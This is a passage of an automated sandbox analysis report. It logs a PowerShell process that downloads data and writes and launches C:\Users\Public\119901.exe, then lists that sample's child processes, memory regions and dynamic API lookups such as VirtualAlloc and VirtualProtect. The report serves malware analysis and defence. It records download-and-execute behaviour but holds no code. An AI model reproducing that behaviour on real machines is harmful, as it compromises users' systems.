| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4224, size_out = 1504 |
|
1 | |
| Inet | Read Response | size = 4224, size_out = 1504 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2720, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 2720, size_out = 1452 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1268, size_out = 1268 |
|
1 | |
| Inet | Read Response | size = 1268, size_out = 1268 |
|
1 | |
| File | Write | filename = C:\Users\Public\119901.exe, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Inet | Read Response | size = 2, size_out = 2 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Inet | Read Response | size = 2, size_out = 2 |
|
1 | |
| File | Write | filename = C:\Users\Public\119901.exe, size = 128 |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| File | Get Info | filename = C:\Users\Public\119901.exe, type = file_attributes |
|
1 |
Thread 0xbdc
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Process | Create | process_name = C:\Users\Public\119901.exe, show_window = SW_SHOWNORMAL |
|
1 |
Process #4: 119901.exe
28
0
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\users\public\119901.exe |
| Command Line | "C:\Users\Public\119901.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:01, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:31 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbe0 |
| Parent PID | 0xb28 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BE4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0028ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00296fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002c2fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002ddfff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002edfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x002fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x0030ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x003effff | Private Memory | Readable, Writable |
|
|
|
- |
| 119901.exe | 0x00400000 | 0x00420fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000430000 | 0x00430000 | 0x005b7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x006fffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x00880fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000890000 | 0x00890000 | 0x01c8ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001ce0000 | 0x01ce0000 | 0x01d1ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001d20000 | 0x01d20000 | 0x02112fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x02120000 | 0x023eefff | Memory Mapped File | Readable |
|
|
|
- |
| rasman.dll | 0x743a0000 | 0x743b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x743c0000 | 0x74411fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pdh.dll | 0x74420000 | 0x7445bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74550000 | 0x74557fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74560000 | 0x745bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x745c0000 | 0x745fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wkscli.dll | 0x74610000 | 0x7461efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x74620000 | 0x74638fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netutils.dll | 0x74640000 | 0x74648fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netapi32.dll | 0x74650000 | 0x74660fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| secur32.dll | 0x747f0000 | 0x747f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msi.dll | 0x74800000 | 0x74a3ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x74c90000 | 0x74ca1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x74ee0000 | 0x74ffcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x751d0000 | 0x75204fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x75290000 | 0x7542cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x75430000 | 0x75565fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x757b0000 | 0x757bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x75860000 | 0x75886fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x765a0000 | 0x7679afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76890000 | 0x76895fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x76a20000 | 0x76aaefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76b40000 | 0x76c34fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Threads
Thread 0xbe4
28
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\user32.dll, base_address = 0x75570000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\user32.dll, process_name = c:\users\public\119901.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 264 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18fac0 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18fac8 |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75570000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x7559ae5f |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x770fe026 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeConsole, address_out = 0x74d66aa8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x74cc5a4b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x74cdeceb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x74cc11c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x74cc14e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x74cc14c9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x74cc11a9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x74cc1809 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x74cc11f8 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x74d43f49 |
|
1 |
Process #5: 119901.exe
53
0
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\users\public\119901.exe |
| Command Line | "C:\Users\Public\119901.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:05, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbf4 |
| Parent PID | 0xbe0 (c:\users\public\119901.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BF8
0x
BFC
0x
70C
0x
80C
0x
81C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a6fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001d2fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001edfff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0027dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0028ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00290fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002bcfff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| windowsshell.manifest | 0x002b0000 | 0x002b0fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x003bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
- |
| 119901.exe | 0x00400000 | 0x00420fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| locale.nls | 0x00430000 | 0x00496fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000004a0000 | 0x004a0000 | 0x0051ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000520000 | 0x00520000 | 0x00521fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000530000 | 0x00530000 | 0x0053ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000540000 | 0x00540000 | 0x006c7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000006d0000 | 0x006d0000 | 0x00850fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x01c5ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001c60000 | 0x01c60000 | 0x01d5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001d60000 | 0x01d60000 | 0x01d60fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001d70000 | 0x01d70000 | 0x01daffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001db0000 | 0x01db0000 | 0x021a2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x021b0000 | 0x0247efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002480000 | 0x02480000 | 0x024bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000024c0000 | 0x024c0000 | 0x025bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000025c0000 | 0x025c0000 | 0x025fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002600000 | 0x02600000 | 0x026fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002700000 | 0x02700000 | 0x0277ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002700000 | 0x02700000 | 0x0273ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002740000 | 0x02740000 | 0x0277ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002780000 | 0x02780000 | 0x0285efff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002860000 | 0x02860000 | 0x0295ffff | Private Memory | Readable, Writable |
|
|
|
- |
| cversions.1.db | 0x02960000 | 0x02963fff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0x02960000 | 0x02963fff | Memory Mapped File | Readable |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x02970000 | 0x0298ffff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000002990000 | 0x02990000 | 0x02990fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000029a0000 | 0x029a0000 | 0x02aa0fff | Private Memory | Readable, Writable |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x029a0000 | 0x029cffff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0x029d0000 | 0x029d3fff | Memory Mapped File | Readable |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x029e0000 | 0x02a45fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002a50000 | 0x02a50000 | 0x02b50fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002a50000 | 0x02a50000 | 0x02a50fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| rsaenh.dll | 0x02a50000 | 0x02a8bfff | Memory Mapped File | Readable |
|
|
|
- |
| comctl32.dll | 0x73e60000 | 0x73ffdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x74380000 | 0x74395fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasman.dll | 0x743a0000 | 0x743b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x743c0000 | 0x74411fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pdh.dll | 0x74420000 | 0x7445bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x744c0000 | 0x7453ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74550000 | 0x74557fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74560000 | 0x745bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x745c0000 | 0x745fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wkscli.dll | 0x74610000 | 0x7461efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x74620000 | 0x74638fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netutils.dll | 0x74640000 | 0x74648fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netapi32.dll | 0x74650000 | 0x74660fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntmarta.dll | 0x74680000 | 0x746a0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| propsys.dll | 0x746b0000 | 0x747a4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wtsapi32.dll | 0x747b0000 | 0x747bcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x747c0000 | 0x747cafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| userenv.dll | 0x747d0000 | 0x747e6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| secur32.dll | 0x747f0000 | 0x747f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msi.dll | 0x74800000 | 0x74a3ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x74c90000 | 0x74ca1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x74ee0000 | 0x74ffcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x751d0000 | 0x75204fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x75290000 | 0x7542cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x75430000 | 0x75565fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wldap32.dll | 0x75700000 | 0x75744fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x757b0000 | 0x757bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x75860000 | 0x75886fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x765a0000 | 0x7679afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x767a0000 | 0x76822fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76890000 | 0x76895fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x76a20000 | 0x76aaefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76b40000 | 0x76c34fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
